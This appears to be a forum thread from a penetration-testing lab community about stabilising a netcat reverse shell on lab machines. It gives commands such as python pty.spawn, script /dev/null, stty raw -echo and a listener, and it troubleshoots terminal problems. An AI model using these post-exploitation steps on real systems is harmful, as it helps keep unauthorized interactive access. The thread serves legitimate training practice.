For the sake of variety; instead of doing the python -c ... thing, thus relying on python being available on the box, you could also do:
script /dev/null, this will give you a pty (as tty will tell you), so su and passwd should work. I usually do a bash -i first. Do note that the environment will still need some fixing up (CTRL+z ... etc and export TERM=linux, export HOME=/tmp or something similar).
Then fix up the rows and columns. Open another terminal
stty -a
Get the rows and columns.
Back on your reverse shell:
stty rows <> columns <>
Rarely does the python part not work… when it doesn’t I simply find a work around or just deal with what I have.
Probably good to note for this that python -c 'import pty;pty.spawn("/bin/bash")' won’t work with any versions of Python3, so specifying python3 -c ... is necessary. Otherwise solid description, you nailed it to a “T”.
I have a curious problem with this kind of shell. I’m working with the Kali KDE distribution with the standard Konsole terminal and /bin/bash/.
I start a reverse shell from another machine.
On my attacking machine I have netcat listening:
nc -l -v -p 80
I get the connection on my host:
listening on [any] 80 …
connect to [10.10.14.2] from craft.htb [10.10.10.110] 40575
/bin/sh: can’t access tty; job control turned off
/opt/app #
I do my routine to elevate the shell:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
CTRL-z
stty raw -echo
fg
reset
I have a fully functional shell BUT I can’t close it. I’ll always have to kill the process. I use exit to leave the shell and end up in a window where I can’t enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.
Any Ideas what could go wrong here?
On a side note, what if I don’t have an /bin/bash on the remote machine? Is it possible to get an fully interactive shell?
@timebeyond said:
I have a fully functional shell BUT I can’t close it. I’ll always have to kill the process. I use exit to leave the shell and end up in a window where I can’t enter any commands. At first I thought that it is a problem with zsh (stty raw -echo; fg kind of) but it is the same in /bin/bash and in Xterm instead of Konsole.
I actually had this exact same issue when I was working on networked. I had to kill the process, but I am not sure what went wrong.
On a side note, what if I don’t have an /bin/bash on the remote machine? Is it possible to get an fully interactive shell?
You can use /bin/sh, which is most of the time just a symbolic link to the real active shell.
@splintercode it appears to have some issues deciding which process that listens to the input pipe though. I run the shell from a small PS-stager that IEXs the Invoke-Con*-definition along with an invocation in the same command, and often I get atleast two powershell.exe’s spinning up a process each for every one I try to start
Turns out it was the combination of three (or possibly four) nested powershell processes (including yours) with DUPd stdhandles. Not much you can do about that, really
Hey, my terminal lags like crazy when I’m upgrading my shell to a fully interactive one with python -c 'import … It happens after I type in stty raw -echo and forground the nc session. Anybody has similar issue?
Personally, I find these methods to always be a bit janky and complicated. I usually immediately go for a socat reverse shell to get a proper tty or get a normal shell first only to set the socat shell up. It just feels a lot more stable and doesn’t have as much unexpected behaviour in my opinion. Also it just feels easier ¯_(ツ)_/¯
Saved me from going nuts, windows guy struggle with shells, and zsh on the new KALI took me out of my comfort zone when post exploit. just chain the command
“stty raw -echo; fg”
I’ve tried the above method few times, but it failed every time. I don’t understand what am I doing wrong…
After doing fg, Enter key is displayed as ^M
Something like this:
$ fg
clear^M
Before you start netcat, change the shell to bash by typing bash then try again try. ZSH sucks mate… ??